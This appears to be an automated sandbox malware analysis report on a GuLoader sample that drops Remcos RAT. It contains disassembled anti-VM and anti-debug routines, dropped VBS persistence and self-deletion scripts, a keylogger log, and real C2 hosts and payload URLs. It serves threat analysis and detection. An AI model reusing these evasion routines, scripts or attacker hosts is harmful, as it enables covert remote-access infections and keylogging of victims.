Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57DB5 second address: 0000000004F57DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57E05 second address: 0000000004F57C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57C28 second address: 0000000004F57E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000567DB5 second address: 0000000000567DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000567E05 second address: 0000000000567C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000567C28 second address: 0000000000567E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F50C76 rdtsc

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\FANEBREREN.exe\DYKKERDRAGTSSoftware\Microsoft\Windows\CurrentVersion\RunOnceAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F50C76 rdtsc

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F55BFE LdrInitializeThunk,

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5546D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5864F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5380C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F585F7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F579C6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F573B7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52D7C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58355 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'

Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp, logs.dat.17.dr	Binary or memory string: [ Program Manager ]
Source: Fec9qUX4at.exe, 00000011.00000002.487647862.00000000009D7000.00000004.00000020.sdmp	Binary or memory string: Program Managerq
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture111	Query Registry1	Remote Services	Input Capture111	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion21	LSASS Memory	Security Software Discovery721	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	System Information Discovery33	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Fec9qUX4at.exe	29%	Virustotal		Browse
Fec9qUX4at.exe	13%	ReversingLabs	Win32.Trojan.Vebzenpak
Fec9qUX4at.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	29%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	13%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458355
Start date:	03.08.2021
Start time:	09:49:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 0s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Fec9qUX4at.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/4@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 20.5% (good quality ratio 7.5%) Quality average: 17.8% Quality standard deviation: 27.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, wermgr.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 13.64.90.137, 52.147.198.201, 23.211.4.86, 20.82.209.183, 93.184.221.240, 40.112.88.60, 40.88.32.150, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 40.126.31.143, 40.126.31.4, 40.126.31.135, 20.190.159.134, 40.126.31.141, 40.126.31.6, 40.126.31.137, 40.126.31.139, 20.49.150.241, 23.203.69.124, 23.203.67.116, 40.126.31.1, 20.190.159.136, 20.190.159.132, 20.190.159.138 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, cdn.onenote.net.edgekey.net, skypedataprdcoleus15.cloudapp.net, login.live.com, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, www.tm.lg.prod.aadmsa.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, cs11.wpc.v0cdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, cdn.onenote.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:51:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs
09:51:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	LzbZ4T1iV8.exe	Get hash	malicious	Browse
	kGSHiWbgq9.exe	Get hash	malicious	Browse
	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	Ordonnance PL-PB39-210706,pdf.exe	Get hash	malicious	Browse	194.5.98.7
	Tzcyxxestkakhuvtmvfdserywturrfjrye.exe	Get hash	malicious	Browse	194.5.98.72
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	WzOSphO1Np.exe	Get hash	malicious	Browse	194.5.98.107
	QUOTATION-007222021.exe	Get hash	malicious	Browse	194.5.97.145
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	ORDER407-395.exe	Get hash	malicious	Browse	194.5.98.23
	Bank Copy.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	FATURAA No.072221.exe	Get hash	malicious	Browse	194.5.98.158

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.638949072783339
Encrypted:	false
SSDEEP:	1536:BUS3/zw2m3c39SYeXvmgU2sIMflWub4cL51tY4SQmiPYElZ943ckw2mUS3/:BT/zM3c3bcBsIMfQuDaSZS3ckYT/
MD5:	2046B941817392E3815535FCCB1F39DC
SHA1:	843D243A71131BAF9FBE0FCF4BA129F51EE74C8F
SHA-256:	C0D3DA1CEFD1A979C8B8CE102FD5D3FF090779F72F4D1098EB383CBBB3480BEE
SHA-512:	ECF0B711C41619DCF9073F1CD4C769CC106B04AAEC40881FC11CBF8686989DA512A9C2EE2683A90B99DDDB1F4A762CF4DF512663519BC9035BBC6D0FD90F9571
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 13%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....(.U.................@..........D........P....@..................................:......................................dK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	5.094609879657231
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRDWXp5cViE2J5xAIzkiw9igECHM:jFqhv9IWXp+N23ffiijl
MD5:	1198AD996993F1C8082084F3CD83DD3C
SHA1:	A841D5A9CA764F8C58EC10FF368C6BD1637E8929
SHA-256:	59227CBFDE96895E1D019A879F7155EF36FE091AB03BEA825C51D9A8A625D6F2
SHA-512:	AB29D0F0FEB1D196E2218958495B39A327CBA2F921EFAB0EA2C09C8E2D42EF2692021A282EC2987E3998369C1876A083933C37FDC50B3C4A0C769513953FAF13
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe")

C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	data
Category:	dropped
Size (bytes):	468
Entropy (8bit):	3.5093499207031558
Encrypted:	false
SSDEEP:	12:xQ4lA2++ugypjBQMPURF3Sbx34Q3Dk3Sbx349Hz/0aimi:7a2+SDTzQTkz9Aait
MD5:	903888A33CC9516D5548F046C7D902EC
SHA1:	D654ADD97768AB9E06A2AC428090BE3E2F0512F6
SHA-256:	75E4262158D66A77E7496606D466EA6CF1333BCE20D429F1E066A2935FD77F0A
SHA-512:	B6BED5DEF33123948A338F1AA65D5D69505487FEF121524C575708894699B0D17A1AA4D3F7C6D1F89CB9730A28C9F20292A5E714F3F2CE2E9D515EB763B45751
Malicious:	true
Reputation:	low
Preview:	O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.\.F.e.c.9.q.U.X.4.a.t...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.\.F.e.c.9.q.U.X.4.a.t...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.353136862680169
Encrypted:	false
SSDEEP:	3:rklKlmuHlKfUFqlDl5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuFK8Fql55YcIeeDAlybW/G
MD5:	23B5A5F0892EDE3E544D530B672DB71C
SHA1:	675F67E5EF80E1868950B6362B54BF367DDA258E
SHA-256:	64A5071CE344184BECC0650D8D6432E0CB0271BAF633BDA82E337D736B13EB01
SHA-512:	03369524C6F224DEA70E9CDEE92DFD71214E6C3B99EC4FE0B09A7F3D69A4F30D67CC6FB2DA9ECA4ED4A4C7572B8E96131321B9B73AE767491BDE4F4CB045C46F
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.3. .0.9.:.5.1.:.1.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.638949072783339
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Fec9qUX4at.exe
File size:	114688
MD5:	2046b941817392e3815535fccb1f39dc
SHA1:	843d243a71131baf9fbe0fcf4ba129f51ee74c8f
SHA256:	c0d3da1cefd1a979c8b8ce102fd5d3ff090779f72f4d1098eb383cbbb3480bee
SHA512:	ecf0b711c41619dcf9073f1cd4c769cc106b04aaec40881fc11cbf8686989da512a9c2ee2683a90b99dddb1f4a762cf4df512663519bc9035bbc6d0fd90f9571
SSDEEP:	1536:BUS3/zw2m3c39SYeXvmgU2sIMflWub4cL51tY4SQmiPYElZ943ckw2mUS3/:BT/zM3c3bcBsIMfQuDaSZS3ckYT/
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....(.U.................@..........D........P....@................

File Icon


Icon Hash:	d5d5959595959595

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x558D28E4 [Fri Jun 26 10:26:44 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B44h
call 00007F9040EB35D5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ch, dh
pop ss
clc
pop edx
push B944FDC7h
mov ebx, 52105E67h
cmp edx, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 53h
inc ebp
inc ebx
inc ebp
push ebx
push ebx
dec ecx
dec edi
dec esi
inc ecx
dec esp
dec ecx
push ebx
push esp
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
jo 00007F9040EB3614h
inc edx
sub cl, ah
imul eax, dword ptr [eax+41h], 81h
or bl, byte ptr [ebx-03CA9598h]
mov esi, 05B7FAFFh
or dl, byte ptr [ebp-48h]
inc esi
mov cl, 74h
and dword ptr [ecx], ecx
jbe 00007F9040EB356Ah
jnle 00007F9040EB35F1h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
